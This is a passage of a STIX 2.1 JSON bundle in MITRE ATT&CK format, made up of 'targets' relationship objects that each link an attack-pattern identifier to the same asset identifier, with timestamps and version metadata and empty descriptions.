"attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e013c082-bbc2-4308-a58f-510c4762d492", "created": "2024-07-01T10:37:15.833182", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833184", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--141245b9-5b2f-4832-8951-c4a8677cf891", "created": "2024-07-01T10:37:15.833192", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833195", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0b04f33-0986-450d-be84-3a08c200b2b1", "created": "2024-07-01T10:37:15.833202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba80affc-1ef8-4d49-a38e-956def0dad09", "created": "2024-07-01T10:37:15.833212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833214", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27da63f3-9e95-4195-aec8-a5b799eeee5e", "created": "2024-07-01T10:37:15.833222", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833224", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53d86a1f-d448-4751-a693-f032585f38a0", "created": "2024-07-01T10:37:15.833231", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833233", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1202d830-e8a2-4b74-82d7-7cdf847b4e03", "created": "2024-07-01T10:37:15.833241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833243", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a8a6dec-9fa4-4ac0-bd35-26b17770c346", "created": "2024-07-01T10:37:15.833250", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833252", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c798b7b8-2182-4bed-a09b-54668697fdac", "created": "2024-07-01T10:37:15.833260", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833262", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07d8d4ed-7305-4dbe-a3e3-6b7aa6554bea", "created": "2024-07-01T10:37:15.833270", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833272", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--781afe59-b960-4fd7-bd8d-1d564f95a9f4", "created": "2024-07-01T10:37:15.833280", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833282", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a28f7698-c057-45a1-be5b-e3692ac5a1a3", "created": "2024-07-01T10:37:15.833290", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833292", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2ecb36a-cbdc-4090-98c1-3fe735a4cead", "created": "2024-07-01T10:37:15.833299", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833301", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84532231-b69c-4742-8fe3-7897f40afb7c", "created": "2024-07-01T10:37:15.833309", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833311", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a8754fe-c471-4622-9ef2-867bd02c5b53", "created": "2024-07-01T10:37:15.833318", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833321", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab683a90-6713-4dbc-9e49-9f44ca1b5420", "created": "2024-07-01T10:37:15.833328", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833330", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c056f12-d5f1-4bcd-80e0-a43e00fd6f59", "created": "2024-07-01T10:37:15.833338", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833340", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c7e7409-6a25-4179-9344-9ca4254cf664", "created": "2024-07-01T10:37:15.833348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b713195-3d7f-4f77-9643-4946e6ed54ca", "created": "2024-07-01T10:37:15.833357", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833359", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6c44966-e5fa-4463-bd38-4c25949224d7", "created": "2024-07-01T10:37:15.833367", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833369", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8dcd9e58-2b98-4c41-abd3-27a827594014", "created": "2024-07-01T10:37:15.833376", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833378", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bef5a1fc-ae61-4133-a7a5-632e2aedbc27", "created": "2024-07-01T10:37:15.833386", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833388", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7ce870b-b366-43f2-a8ae-65e84173ed10", "created": "2024-07-01T10:37:15.833396", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833398", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e582f02b-f92d-4cf8-8385-ce55f9f3258b", "created": "2024-07-01T10:37:15.833405", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833407", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33717dd4-0336-4a13-8df2-803afdec7683", "created": "2024-07-01T10:37:15.833415", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833417", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d53141d-04d1-4710-89ee-e6f367ae65c3", "created": "2024-07-01T10:37:15.833424", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833426", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99047fb9-3552-4fee-86ad-87532bfaa55a", "created": "2024-07-01T10:37:15.833434", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833436", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3eea9b91-fdbe-4dd6-8a27-868748e40412", "created": "2024-07-01T10:37:15.833444", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833446", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2420c17-486a-425a-80bb-3609d9839248", "created": "2024-07-01T10:37:15.833453", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833455", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d6a4ef9-f0ca-4709-9baa-702596a23550", "created": "2024-07-01T10:37:15.833463", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833465", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cbb944aa-cdeb-43d8-83c0-6b1579bbd1cf", "created": "2024-07-01T10:37:15.833473", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833475", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d3e29d1-0607-4691-980d-2d48d4a0ed34", "created": "2024-07-01T10:37:15.833482", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833484", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7eaa2209-b547-4fec-910e-aa38aabe7016", "created": "2024-07-01T10:37:15.833492", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833494", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d8db4384-97c9-4a18-8fce-6def64b8ea1b", "created": "2024-07-01T10:37:15.833502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833504", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df1004cf-f213-43d3-963e-810e965b4c6a", "created": "2024-07-01T10:37:15.833512", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833514", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26834448-6000-446a-8af8-6d12c7650363", "created": "2024-07-01T10:37:15.833521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5dd8d88-2fb6-4cc2-98a6-5e3eaace803b", "created": "2024-07-01T10:37:15.833531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--475d08f5-bc67-4328-94d7-8b7726adaef6", "created": "2024-07-01T10:37:15.833541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e538a9e-c7d2-4f9a-aa12-ac3c9f04a19e", "created": "2024-07-01T10:37:15.833550", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833552", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12c54012-3f97-4fe8-9ca6-9c91ca9b79e6", "created": "2024-07-01T10:37:15.833560", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833562", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5f958fb-372b-487f-a23e-b5df09aa01d9", "created": "2024-07-01T10:37:15.833569", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833571", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", 